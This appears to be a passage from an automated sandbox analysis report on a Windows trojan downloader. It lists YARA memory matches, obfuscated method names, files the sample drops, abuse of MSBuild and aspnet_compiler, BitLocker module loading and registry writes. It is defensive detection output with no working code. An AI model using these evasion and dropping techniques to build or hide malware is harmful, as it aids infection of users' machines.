Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.425a060.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.4232040.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.2248679548.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2526240071.0000020541A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1819140770.000001A946430000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1530270940.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2305476496.000001A956C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1955857025.00000205313C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2700600330.0000029A74620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2305476496.000001A956BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1492488250.00000000057A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2526240071.00000205419DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2144258743.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1872584736.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1530270940.0000000002AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2314717443.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1910595763.000001B806521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1588820194.00000000031DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2144258743.00000000041A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1530270940.000000000299E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.1968077949.00000154E5C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1746723723.0000029A001B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1443307685.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2866397789.000000000473E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2144258743.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2305476496.000001A956B55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2248679548.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2526240071.0000020541AF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1447665099.0000000004CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1830875992.000001A946511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1460469542.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2526240071.0000020541A09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1635084673.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1635965900.00000000046DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1470593707.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1447665099.0000000004158000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe PID: 5904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe PID: 412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Keywords.exe PID: 1568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Keywords.exe PID: 64, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 4456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fdyryi.exe PID: 6100, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fdyryi.exe PID: 3852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Keywords.exe PID: 512, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AlgorithmType.exe PID: 5892, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Keywords.exe PID: 1568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AlgorithmType.exe PID: 6812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_compiler.exe PID: 5572, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pjmskbbdr.exe PID: 2996, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_05F55892 push eax; retf 0_2_05F55899
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_08093D70 pushfd ; ret 0_2_08093D77
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_08093DAE pushad ; ret 0_2_08093DB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05AB3D56 push cs; ret 2_2_05AB3D61
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_06457468 pushad ; ret 2_2_06457469
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_0645943A pushfd ; iretd 2_2_0645943B
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_05D321D0 pushfd ; ret 5_2_05D321D1
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_064D3D70 pushfd ; ret 5_2_064D3D77
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_064D3DAE pushad ; ret 5_2_064D3DB3
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D33D56 push cs; ret 7_2_05D33D61
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05D3310C pushad ; iretd 7_2_05D3310F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_06143D70 pushfd ; ret 8_2_06143D77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_06143DAE pushad ; ret 8_2_06143DB3
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Code function: 15_2_00007FF7C106842E pushad ; ret 15_2_00007FF7C106845D
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Code function: 15_2_00007FF7C106786E pushad ; retf 15_2_00007FF7C106789D
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Code function: 15_2_00007FF7C106845E push eax; ret 15_2_00007FF7C106846D
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Code function: 15_2_00007FF7C106789E push eax; retf 15_2_00007FF7C10678AD
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Code function: 15_2_00007FF7C10627C1 pushad ; retf 15_2_00007FF7C1062969
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_0586F2E0 pushad ; retn 0005h 21_2_0586F342
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C36FBB push 6ED605C3h; ret 21_2_05C36FCA
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05C82881 push dword ptr [esp+ebp-75h]; iretd 21_2_05C8288B
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05F83D56 push cs; ret 21_2_05F83D61
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 21_2_05F8310C pushad ; iretd 21_2_05F8310F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 23_2_00007FF7C104842E pushad ; ret 23_2_00007FF7C104845D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 23_2_00007FF7C104786E pushad ; retf 23_2_00007FF7C104789D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 23_2_00007FF7C104845E push eax; ret 23_2_00007FF7C104846D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 23_2_00007FF7C104789E push eax; retf 23_2_00007FF7C10478AD
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code function: 23_2_00007FF7C10427C1 pushad ; retf 23_2_00007FF7C1042969
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, Program.cs High entropy of concatenated method names: 'Main', 'HcFZ6vhhF', 'dVKd867LM', 'eD6U8sjaP9pZyqmbCTX', 'Xg1doFjPu7c2IBWoGI0', 'BC3cDPjigeyxncDbm8X', 'UdlFlijBk69E4aEWUMh', 'mK0Jomjr9DXkbKHymYd', 'vmcyRUjnyVuelTHWCjj', 't2AUdBj6ELehSRkH5TG'
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, bRjamkahGpNcHlBjdu.cs High entropy of concatenated method names: 'vxsOBXp3ZvBt9SX91OH', 'bjUbEApWHdXuB4L7hkv', 'NTaWyeXUU2', 'eVmIvhpqpsZc5VQitfg', 'y6Ar3cpTlTek04152FN', 'DJ6ncFp2XMAnwVt5e69', 'VdPyUnpkjkgdIZOju8q', 'Xt7IEdpKNOBUVQXELab', 'SAuCvXpRSGuYRPyVaZu', 'ouRbA1p7kUB1Uau3hly'
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, TY6CS6LH8PrYlPSxe67.cs High entropy of concatenated method names: 'LgVLIfl4pR', 'B6NLb8GSoG', 'VZGLNPrZFd', 'fVXLFdiDPf', 'wmdL8JkKTA', 'A31LA1iRvl', 'tEbLX8ZdHP', 'RA3LJw5OCg', 'YHsLhaMdd3', 'F6LLsNMihF'
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, LXqGUXxkuxrH4Tryku.cs High entropy of concatenated method names: 'Iekq4RaCGD', 'K3QyrZjOEy5e9FEtVI1', 'ah751ajvVjidQSMAep7', 'xbG3SsjMSp4K8dO6oNE', 'JgxkOYjlBJT6CtSQbFU', 'Y1uCISjwhYU1uZvOSG9', 'BSf2RljVkJbC4ecaUSR', 'l006UFjyUoi1y5u4Xd6'
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe File created: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\fdyryi.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe File created: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe File created: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Stores large binary data to the registry
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\9b6048d01894c73222f12c43ae5e9503 F09CA6523A09C809FF28661ACBD77D06
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
